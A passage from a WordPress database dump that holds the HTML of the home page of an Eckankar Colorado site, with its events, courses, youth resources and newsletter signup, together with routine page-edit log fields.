0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237045,40284,'post_title','Home'),(237044,40284,'post_type','page'),(237037,40283,'_message_key','post_updated'),(237038,40283,'_user_id','2'),(237039,40283,'_user_login','S8zhaBda'),(237040,40283,'_user_email','nada@zipnadanot.org'),(237041,40283,'_server_remote_addr','76.130.120.x'),(237042,40283,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(237043,40284,'post_id','7160'),(237036,40283,'post_new_post_content','\r\n\r\n<div style=\"height: 150px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\" ><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open 